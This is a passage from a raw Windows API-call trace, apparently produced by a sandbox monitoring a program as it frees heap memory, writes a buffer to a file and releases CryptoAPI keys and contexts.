hHeap=0x970000) returned 1 [0250.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0250.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0250.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0250.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0250.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0250.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0250.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0250.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0250.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0250.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6f78) returned 0x3bf0050 [0250.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f36d90 | out: hHeap=0x970000) returned 1 [0250.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0250.232] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0250.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0250.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0250.232] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0250.232] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0250.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0250.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0250.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0250.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0250.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0250.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0250.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6f78) returned 0x2f14010 [0250.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0250.233] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f14010*, nNumberOfBytesToWrite=0x6f78, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14010*, lpNumberOfBytesWritten=0x8cf5e4*=0x6f78, lpOverlapped=0x0) returned 1 [0250.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0250.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0250.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0250.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0250.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0250.236] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0250.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0250.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0250.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0250.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0250.237] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0250.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0250.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0250.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0250.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0250.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0250.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0250.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513a0 [0250.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0250.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51358 [0250.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51430 [0250.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0250.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51388 [0250.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0250.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0250.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514c0 [0250.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ae8 [0250.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0250.238] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0250.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ae8 | out: hHeap=0x970000) returned 1 [0250.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0250.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0250.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55068 [0250.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0250.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0250.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0250.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0250.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51448 [0250.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0250.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0250.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0250.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0250.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0250.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0250.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0250.239] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0250.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0250.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0250.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0250.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0250.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0250.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0250.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0250.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0250.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0250.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0250.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0250.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0250.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0250.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0250.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0250.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0250.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0250.239] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f80 | out: hHeap=0x970000) returned 1 [0250.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0250.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51418 [0250.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0250.240] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0250.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0250.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0250.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0250.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0250.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0250.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0250.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0250.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0250.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0250.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0250.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0250.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0250.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0250.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0250.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0250.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0250.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0250.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0250.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0250.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0250.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0250.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0250.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0250.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0250.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0250.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0250.241] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0250.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0250.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0250.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0250.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0250.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0250.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0250.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0250.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0250.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0250.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0250.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0250.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0250.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0250.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0250.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0250.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0250.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0250.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0250.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0250.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0250.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0250.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0250.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51760, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0250.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0250.243] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0250.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0250.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0250.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0250.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0250.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0250.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0250.243] CryptDestroyKey (hKey=0xa875d0) returned 1 [0250.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0250.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0250.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0250.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0250.244] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0250.244] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0250.244] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0250.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0250.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0250.244] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0250.244] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0250.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55dc0 | out: hHeap=0x970000) returned 1 [0250.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0250.244] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0250.245] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0250.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0250.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0250.245] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0250.245] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0250.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0250.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0250.245] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0250.245] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0250.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0250.245] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0250.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0250.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0250.245] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0250.246] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0250.246] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.246] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0250.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0250.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0250.246] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.246] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0250.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0250.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0250.246] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0250.247] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0250.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0250.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0250.247] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.247] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0250.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a78 | out: hHeap=0x970000) returned 1 [0250.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0250.247] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0250.247] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.247] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a78 | out: hHeap=0x970000) returned 1 [0250.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0250.248] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0250.248] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0250.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0250.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0250.248] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0250.248] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0250.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0250.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69a68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0250.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0250.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0250.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0250.249] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0250.249] HeapFree (in: 